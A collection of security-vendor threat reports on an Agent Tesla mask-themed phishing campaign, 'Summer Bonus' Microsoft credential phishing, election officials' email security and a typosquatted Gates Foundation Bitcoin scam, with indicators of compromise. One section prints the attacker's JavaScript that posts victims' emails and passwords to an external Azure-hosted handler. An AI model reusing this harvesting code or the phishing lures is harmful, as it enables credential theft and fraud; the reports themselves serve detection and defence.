Recent phishing campaigns are also capitalizing on this trend by sending email attachments infected with Agent Tesla malware, an advanced Remote Access Trojan (RAT), to various companies under the guise of a mask production business venture. Area 1 Security caught these attacks filled with enticing traps that bypass legacy vendors and would have otherwise made their way into users’ inboxes.

A prevalent phishing campaign loaded with a malicious executable is attempting to wreak havoc on companies worldwide, spanning numerous industry verticals. This campaign began as early as May, during the start of major lockdowns and mask shortages across the globe due to the COVID-19 pandemic. There have been numerous iterations of the campaign, but the main body of text remains the same.

The attacker lures targets by using language that preys on fears surrounding COVID-19 and claiming to offer face masks and forehead thermometers, products currently in high demand but short supply. To avoid detection, the phishing campaign generally follows a 10-day cycle wherein the threat actor slightly modifies their Tactics, Techniques, and Procedures (TTPs) before launching a new wave of emails. A recent phishing message from this campaign can be found below.

Transchem Inc. is not associated in any way with this attack

The attacker spoofs chemical manufacturers and import/export businesses to make the phishing message appear more legitimate. Area 1 Security’s research shows that the attacker continually revises their phishing messages by periodically spoofing different companies in an effort to evade detection. For the example phish above, the attacker spoofed Transchem Inc., a legitimate chemical supplier. With previously spoofed companies, the attacker included the real email address of the purported sender in the signature block; however, in this latest campaign, they remove it to reduce the chances of being detected.

To achieve the greatest success in reaching the most inboxes, the attacker uses a dynamic approach to stay one step ahead of common email security defenses:

• With each wave of the campaign, the attacker rotates to a new IP address in a likely attempt to bypass filters that only deny based on known sources of malicious activity;

• Furthermore, the malware in the attachment is continually modified in order to change its hash; and

• With a new hash value, the malware is effectively brand new — legacy detections that are configured to scan for known malicious hashes will not alert on this.

Additionally, due to flaws in the implementation and configuration of email authentication protocols, such as DMARC, SPF and DKIM, the attacker is able to successfully spoof the legitimate sender domains of numerous companies. This demonstrates that the complexity and nuances involved in setting up these protocols can leave you open to attack, and, even when implemented properly, are not enough to protect you from the dynamic phishing attacks that plague companies and individuals.

After bypassing a well-known email gateway and DMARC controls, the only defense left is for the email recipient to recognize this email as a phish. However, the attacker goes to great lengths to present an authentic façade. They:

• Impersonate real employees at various companies to fool unsuspecting targets into downloading purported information on the production of face masks and forehead thermometers;

• Include the legitimate logo of the spoofed company, as well as accurate mailing and contact details; and

• Include the URL in the email’s signature block also leading to the legitimate website of the impersonated company.

The attacker is clearly going the extra mile to ensure this spoof will appear as authentic as possible for unsuspecting targets.

Once the email is delivered, recipients are a mere two steps away from executing the Agent Tesla RAT. The target only needs to extract the compressed attachment, then click on the resulting “PDF”, which will launch the malware.

To further reduce suspicion, the attachment’s file name is manipulated to make it appear legitimate. More specifically, the attacker always names the attached file “Supplier-Face Mask Forehead Thermometer.pdf.gz”. The use of a double extension will often trick targets into thinking the file is a PDF, when in fact it’s a compressed executable. This ruse is made possible by the fact that many modern operating systems do not display the file extension (in this case “.gz”) for known extensions by default.

Once downloaded, victims may only see “Supplier-Face Mask Forehead Thermometer.pdf”, which is the actual file name. To make matters worse, some legacy vendors inspect an attachment’s extension rather than the file properties itself, thus allowing compressed executables to bypass rule filtering that is based on file extension.

The attachment is the focal point of this face mask-themed campaign. In order to carry out its information stealing capabilities, this infected attachment requires the target to take action by unzipping and clicking on the resulting file, “Supplier-Face Mask Forehead Thermometer.pdf.exe”. If this file is opened, the victim host will be infected with Agent Tesla, a form of Malware-As-A-Service (MaaS), which provides attackers with a dashboard and user interface (UI) to monitor the success of their campaign. Agent Tesla is an advanced RAT that functions as a keylogger and information stealer, and its primary delivery method is via attachments in phishing emails.

Although Agent Tesla first surfaced in 2014, it is making a resurgence as the preferred MaaS for attackers, superseding even TrickBot and Emotet. The main advantage of Agent Tesla is its ability to adapt and change to avoid detection, providing attackers with a stealthy platform to launch attacks and bypass security measures. Various tiers are available for purchase that provide additional licenses and different functionality. However, in typical internet fashion, there is a torrent available on Russian websites.

For the initial file, the attacker uses a 32-bit Windows executable to ensure that the malware can be executed on common Windows devices. This file is a trojan, appearing as a benign application but containing hidden, malicious functionality. This initial phase determines if it is in a malware analysis environment so the program can decide whether to proceed with the attack or go to sleep.

If the malware detects it is in a target’s device, it will make a connection to the attacker’s command and control (C2) server located at us2[.]smtp[.]mailhostbox[.]com. This initial connection does not contain any information; rather, it is only an attempt to provide the attacker with confirmation that the malware successfully ran on the target device.

The malware contains functionality to read the data within a victim’s AppData folder, which contains browser credentials and credentials from email clients. The malware will attempt to load missing DLLs and download additional files in order to exfiltrate stolen information from the AppData folder. This data is sent to the C2 via SMTP as seen in packet capture below. This is a common tactic for exfiltration, given outgoing emails containing sensitive information are not likely to be marked as suspicious unless Data Loss Prevention (DLP) software is configured. The exfiltrated victim information is then available to the attacker via the Agent Tesla UI for use in future attacks.

With each new wave of this phishing campaign, the malware is updated by using a number of advanced obfuscation techniques to avoid detection by antivirus software:

• Firstly, the attacker generates a new hash for the attached file in order to circumvent defenses that leverage databases of known malware files. This is done in part by generating executables written for the .NET framework and constantly recompiling with alternative feature sets.

• Secondly, a number of anti-debugging methods are employed to halt any reverse engineering. These methods check if a debugger is present, as well as hiding threads and breakpoints from debugging tools.

If you think your device may have been compromised by malware, it’s imperative to run a full scan of your system to check for signs of infection. It’s also vital to keep your software and OS secure by installing the latest updates on a routine basis in order to reduce exposure to this “Face Mask Supplier” phishing campaign.

It is not enough to rely on email gateways, cloud email suites and traditional AV to protect against these types of attacks, as the threat actor is continually evolving and finding new ways to leverage commodity malware like Agent Tesla.

As attackers often rely on the end user to download and install malicious executables, it is also vital that employees are aware of common tactics an attacker may use to trick targets into opening malicious files. Unsolicited emails from unknown companies should be regarded as guilty until proven otherwise and reported to the security team. Additionally, any attachments containing compressed files should be handled with extreme caution, and any executable files should not be opened. These extra verifications are just a small precaution but go a long way toward ensuring the safety and security of your organization.

With each wave of the campaign, the malicious files and attacker infrastructure are altered to evade detection. Fortunately, Area 1 Security’s comprehensive protection detects and blocks Agent Tesla-based phishing attacks and other targeted campaigns before they can cause any damage.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.

Attachment: Supplier-Face Mask Forehead Thermometer.pdf.gz:

MD5: fdfaaf9efb8507262ee9b97324bbb69a

SHA1: 846da85a2f2e6e79ebc7ed84b00ed97af513c80f

SHA256: b419849ce915ede72fda1ea0b566651e233ef5eaffbf8b9211bd44085407ad5e

Executable: Supplier-Face Mask Forehead Thermometer.pdf.exe

MD5: 64bc654373549584f7e596de24e1d8cc

SHA1: 6a39bd3ddaa2c9846e2a4912a80fd718eaee622f

SHA256: 53445247552485c277400bafba84458670f0c1001c91b4f0bcc15935c12d662b 

Command and Control Server:

us2[.]smtp[.]mailhostbox[.]com

Sender IP Addresses:

209[.]58[.]149[.]65

203[.]188[.]252[.]14

185[.]66[.]40[.]36

50[.]28[.]40[.]153

62[.]210[.]83[.]136

72[.]32[.]232[.]136

95[.]216[.]16[.]146

209[.]58[.]149[.]66

89[.]33[.]246[.]113

178[.]239[.]161[.]164

156[.]96[.]47[.]65

209[.]58[.]149[.]69

95[.]211[.]208[.]50

209[.]58[.]149[.]87

37[.]48[.]85[.]232

208[.]91[.]199[.]224

Isn’t it great that some companies are giving out bonuses to their front-line workers amidst the pandemic? That’s precisely what the creators of two new Microsoft phishing campaigns, that Area 1 has dubbed “Summer Bonus”, are using to lure unsuspecting employees into divulging their Microsoft credentials. Few companies are doing well enough to give out bonuses these days, making an unexpected notification from your employer on a paycheck increase all the more enticing. Area 1 Security suspects that this attack is inspired by all the media buzz around unprecedented bonuses to essential workers. No good deed goes unpunished.

Microsoft SharePoint Phishing schemes have increasingly plagued companies using the Microsoft Office 365 Suite in recent years. In the spear phishing example below, even a diligent user versed in online safety measures could be fooled by this highly convincing phishing attempt. The attack leverages sophisticated social engineering techniques and a flaw in how legacy email solutions detect malicious messages.

Targeted victims receive an email similar to the one below.

The email is crafted well enough to pass for a legitimate file share request that most employees wouldn’t think twice about clicking. (Who would pass up a bonus, especially in the COVID-era?) The FROM address is spoofed to look like it’s coming from an automated service within the targeted company, i.e. noreply@<company.com>. A careful analysis of the email headers indicates the first Mail Transfer Agent is a Russian-based server farm hosted at mgn-host[.]ru, which is where the bulk of the emails originated before August 1st.

Unsurprisingly, a WHOIS lookup of this sender domain, as shown below, reveals little useful information about the registrant.

% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer:        whois.tcinet.ru
domain:       RU

organisation: Coordination Center for TLD RU
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation

contact:      administrative
name:         .RU domain Administrative group
organisation: Coordination Center for TLD RU
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation
phone:        +7 495 730 29 71
fax-no:       +7 495 730 29 68
e-mail:       ru-adm@cctld.ru

contact:      technical
name:         Technical Center of Internet
organisation: Technical Center of Internet
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation
phone:        +7 495 730 29 69
fax-no:       +7 495 730 29 68
e-mail:       ru-tech@tcinet.ru

nserver:      A.DNS.RIPN.NET 193.232.128.6 2001:678:17:0:193:232:128:6
nserver:      B.DNS.RIPN.NET 194.85.252.62 2001:678:16:0:194:85:252:62
nserver:      D.DNS.RIPN.NET 194.190.124.17 2001:678:18:0:194:190:124:17
nserver:      E.DNS.RIPN.NET 193.232.142.17 2001:678:15:0:193:232:142:17
nserver:      F.DNS.RIPN.NET 193.232.156.17 2001:678:14:0:193:232:156:17
ds-rdata:     32215 8 2 803E2ADED022F18F59CBD68A39812BC2D224D2A68E6D701BEDF62B7E4CD92233

whois:        whois.tcinet.ru

status:       ACTIVE
remarks:      Registration information: http://www.cctld.ru/en

created:      1994-04-07
changed:      2020-07-09
source:       IANA

# whois.tcinet.ru

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        MGN-HOST[.]RU
nserver:       ns1.mgnhost.com.
nserver:       ns2.mgnhost.com.
nserver:       ns3.mgnhost.com.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     REGTIME-RU
admin-contact: https://whois.webnames.ru
created:       2009-09-13T20:00:00Z
paid-till:     2021-09-13T21:00:00Z
free-date:     2021-10-15
source:        TCI

After August 1st, a new wave of the campaign emerged, divulging a change in the attacker’s tactics. The campaign is now being launched via a virtual private server (VPS), obscuring the attacker’s true origin and making the header seem a bit more innocuous than a glaring .ru address. It’s evident that the attacker is adapting to new detection techniques.

A large number of Area 1 Security customers were targeted in this ongoing attack, aimed at harvesting user credentials. At first glance, the message seems benign enough. The email displays a Microsoft SharePoint notification tailored to the targeted company and contains the recipient’s email address. Disguised as a simple “Open” button, the link in the message body leads to an AppSpot URL: hxxps://useryxijxui99[.]an[.]r[.]appspot.com/#@.com. Every few days the attacker changes subdomains in an attempt to evade detection.

Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Despite its legitimate uses, AppSpot is a commonly abused platform, offering attackers a clever way to bypass traditional spam and phish filters. When clicked, this AppSpot link reveals a very convincing Microsoft login portal as shown below.

The success of these campaigns is a result of the infamous Layer 8 error (user error, for the non-technicals). Among other techniques, an easy way to spot if a login portal is being spoofed is to simply verify the URL. If the site is a login for Microsoft then the corresponding link should direct your browser to a legitimate Microsoft domain, not appspot.com. The adage “if it seems too good to be true” also rings true for most phishing schemes. It’s always good practice to check with a supervisor before responding to unsolicited requests for credentials or logins, especially as they pertain to company financial matters.

This campaign peaked on July 31st in a likely attempt to dupe targets into believing this was a legitimate end-of-month bonus. In the days following, the number of emails drastically decreased, with the attacker sending only a small batch of phish every three to four days usually near the end of the business day. Despite the decline in this “Summer Bonus” phish, Area 1 Security believes there could be a resurgence of this attack in the coming months.

Analyzing the source file of the spoofed login page reveals several interesting methods the attacker is using to circumvent defenses and steal credentials. To give a high-level overview of the process, the login page is hosted on AppSpot and, as such, is issued a valid SSL certificate. To an unsuspecting user, this gives an otherwise malicious site a very trustworthy appearance.

Benign cloud-based services like AppSpot provide attackers the perfect platform for hosting their malicious content, all the while flying under the radar of legacy vendor email security solutions. The attacker used the HTML/CSS framework of the authentication page for the Microsoft portal but replaced the JavaScript with their own malicious functions.

In the below code snippet you can see how the attacker is sending victim credentials to the cloud-based site hxxps://701r10010ye[.]azurewebsites[.]net. This additional attacker infrastructure is hosted on yet another commonly abused cloud computing platform, Microsoft Azure. In other words, to better evade detection, the attacker is abusing multiple cloud-based services for not only hosting spoofed login pages but also for obtaining the stolen credentials.

if($('.pass_section_xyz').length){
var pass = $('#i0118');
	var password_v = pass.val();
	if(yid && yid != '' && yid.length > 4 && password_v != ''){
		//var password_v = login_passwd.val();
			
		/*  */
			$.ajax({
url: 'https://701r10010ye.azurewebsites.net/handler.php', 
type: 'POST', 
dataType: 'html', 
beforeSend: function(){
$('.ldsddddd').show();
},
data: { Email : yid, password : password_v}, 
crossDomain: true,
success: function(msg) {
//alert(msg);
$('.ldsddddd').hide();
	if(msg == 'yes'){
		$('.alert_email_sect').hide();
		window.location.replace("https://portal.office.com");
	}
	else{
		$('.alert_msg_yxq').html("Your account or password is incorrect. If you don't remember your password");
		$('.alert_email_sect').show();
	}

A derivative of the SharePoint phish detailed above is wreaking havoc on company inboxes. This variant, possibly carried out by the same attackers, again uses the pretext of a “Summer Bonus” — but this time, attempts to spoof a Microsoft Planner email notification.

This spear phish is another great example of how attackers are skillfully crafting phishing messages to lure their targets. The text, images, and formatting are an almost identical match to the real Microsoft Planner notifications. This demonstrates how even employee cybersecurity training is not enough for a company to effectively mitigate their threat surface.

The most glaring evidence that this is a phishing email can be found in the sender field. The attacker created a display name that makes it appear as if the true sender address was one belonging to the targeted company (i.e., noreply@sharepoint[.]com @<targeted_company.com>). The most scrupulous users might easily dismiss such a sender as benign. However, a closer look at the email headers exposes the true sender address, root@hwsrv-757045[.]hostwindsdns[.]com. Based on the sender domain, the attacker is using a VPS provider to launch their phishing campaign. Threat actors commonly rely on VPS services not only for their scalability and ease of use but also for their ability to obscure the attacker’s true location.

As with the previous Sharepoint campaign, the detection of this “Microsoft Planner” phish uncovered the continued abuse of cloud computing platforms, this time Amazon Web Services (AWS). The “Open in Microsoft Planner” button in the body of the message links to hxxps://officezbf0kmun0j324qysxn0y98zchskfee[.]s3[.]us-east-2[.]amazonaws.com/index.htm?c=@.com. The AWS bucket associated with this attack was inactive at the time of writing; however, it is highly likely the URL linked to another spoofed Microsoft login portal.

This ever-evolving “Summer Bonus” campaign is an ongoing threat to many individuals and businesses alike. The use of VPS providers, as well as abuse of multiple cloud services throughout several stages of the attack, make it a particularly difficult campaign to detect. To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this. In fact, the messages successfully passed through Microsoft’s Office 365 filter despite these red flags.

Fortunately, Area 1 Security detected this stealthy “Summer Bonus” campaign and stopped these phish from reaching our customers’ inboxes.

Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.

hxxps://useryxijxui99[.]an[.]r[.]appspot[.]com/#@.com

hxxps://riqri733r[.]ts[.]r[.]appspot[.]com/#@.com

https://officezbf0kmun0j324qysxn0y98zchskfee\[.\]s3\[.\]us-east-2\[.\]amazonaws\[.\]com/index.htm?c=@.com

hxxps://701r10010ye[.]azurewebsites[.]net/handler[.]php

root@hwsrv-757045[.]hostwindsdns[.]com

vds62403[.]mgn-host[.]ru

Today, Area 1 Security published the results of “Phishing Election Administrators,” a comprehensive study analyzing more than 10,000 U.S. state and local election administrators’ email phishing vulnerabilities. With fewer than 100 days left until Election Day, the report reveals that states are still in widely varying stages of cybersecurity readiness.

Key findings include:

• The majority (53.24 percent) of state and local election administrators have only rudimentary or non-standard technologies to protect themselves from phishing;

• Fewer than 3 out of 10 (28.14 percent) election administrators have basic controls to prevent phishing;

• Fewer than 2 out of 10 (18.61 percent) election administrators have implemented advanced anti-phishing cybersecurity controls;

• A surprising 5.42 percent of election administrators rely on personal email accounts or technologies designed for personal email (such as Yahoo!, Hotmail, AOL or others), to conduct their duties; and

• A number of election administrators independently manage their own custom email infrastructure, including using versions of Exim known to be targeted by cyber actors linked to the Russian military that interfered in prior U.S. elections.

Ninety-five percent of cybersecurity damages worldwide begin with phishing, and phishing campaigns come in all shapes and sizes. The majority of phishing campaigns begin with an innocuous and authentic email that individuals are unable to recognize as malicious. Consequently, the quality of email protection used by organizations and individuals has an inordinate bearing on their overall cybersecurity posture.

“Our elections are vital. They need to be resilient against whatever crisis the moment throws at us — and that requires resources and planning,” said Oren J. Falkowitz, co-founder of Area 1 Security. “However, most state and local election administrators are not very close to ensuring a safe election. This challenge is going to be exacerbated the longer it takes for them to get the resources and expertise needed to make changes.”

Area 1’s email security recommendations for state and local election administrators include:

• Ending use of Exim email servers: Given the government’s guidance to update Exim to mitigate CVE-2019-10149 and other vulnerabilities including, but not limited to, CVE-2019-15846 and CVE-2019-16928, election administrators are urged to cease use of Exim. Upgrading alone does not mitigate exploitation. Prior Russian cyber activities directed towards U.S. elections make use of Exim ill-advised. For those who must continue running Exim, update to the latest version; running a version prior to 4.93 leaves a system vulnerable to disclosed vulnerabilities. Administrators can update Exim Mail Transfer Agent software through their Linux distribution’s package manager or by downloading the latest version from https://exim.org/mirrors.html.

• Transitioning to cloud email infrastructure: Running custom email infrastructure requires network administrators to be perfect every single day. Instead, Area 1 Security recommends the use of cloud email infrastructure such as Google’s GSuite or Microsoft’s Office 365 in combination with a cloud email security solution.

• Ending use of personal email technologies for election duties: Under no circumstances should election administrators use personal email for the conduct or administration of elections.

Area 1 Security is committed to Responsible Disclosure guidelines in all situations where it uncovers specific and verifiable campaign activity. As part of our commitment to those guidelines, Area 1 has been engaged with relevant stakeholders that have an interest in understanding this campaign in greater depth.

Each day, hundreds of thousands of new domains are registered by users around the world. Unfortunately, the simplicity of domain registration makes it simple for attackers to register fraudulent domains for use in phishing campaigns. In fact, according to ICANN, nearly 5.45% of newly registered domains per day are malicious (including phishing, botnets, and malware). This means there are 25,070 newly registered malicious domains per day on average.

On July 16th, 2020, an email appearing to be from the Bill & Melinda Gates Foundation was sent to numerous recipients, seeking donations for the Foundation in Bitcoin. The email enticed potential donors by offering to double any donations received within seven days. The sender domain of the email was strikingly similar to the legitimate foundation’s domain, gatesfoundation.org.

Aside from one letter, the malicious sender domain could easily pass for one belonging to the Gates Foundation. The attacker cleverly employed typosquatting when creating the domain name, just minutes before sending the email. Without close scrutiny, the domain’s typo is indistinguishable from the legitimate domain. The attacker also set up an SPF record for the domain in order to ensure reliable delivery of their attack. Interestingly, this phish was sent just a day after Bill Gates’ Twitter account was hacked and used to tweet a message nearly identical to this email.

Benign Domain: gatesfoundation.org
Malicious Domain: gatesfoundatlon[.]com
Malicious Domain Age: 2020-07-16 17:00:54 +0000 UTC
SPF Record:
     gatesfoundatlon[.]com.	1759	IN	TXT	"v=spf1 include:spf.privateemail.com ~all"
Bitcoin address: 18XJzrgPqYhKKeR2j4vz6wPQorK3sNuNxs

Domain name: gatesfoundatlon[.]com
Registry Domain ID: 2546450570_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2020-07-16T17:00:54.00Z
Registrar Registration Expiration Date: 2021-07-16T17:00:54.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code:
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Registry Admin ID:
Admin Name: WhoisGuard Protected
Admin Organization: WhoisGuard, Inc.
Admin Street: P.O. Box 0823-03411
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code:
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Registry Tech ID:
Tech Name: WhoisGuard Protected
Tech Organization: WhoisGuard, Inc.
Tech Street: P.O. Box 0823-03411
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code:
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2020-07-15T23:22:34.80Z <<<

Area 1 uses multiple analysis techniques that leverage insight gained from proactive web crawling and early identification of attacker campaign infrastructure, to detect and stop email from spoofed domains and accounts. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including malicious newly registered domains, that other defenses miss.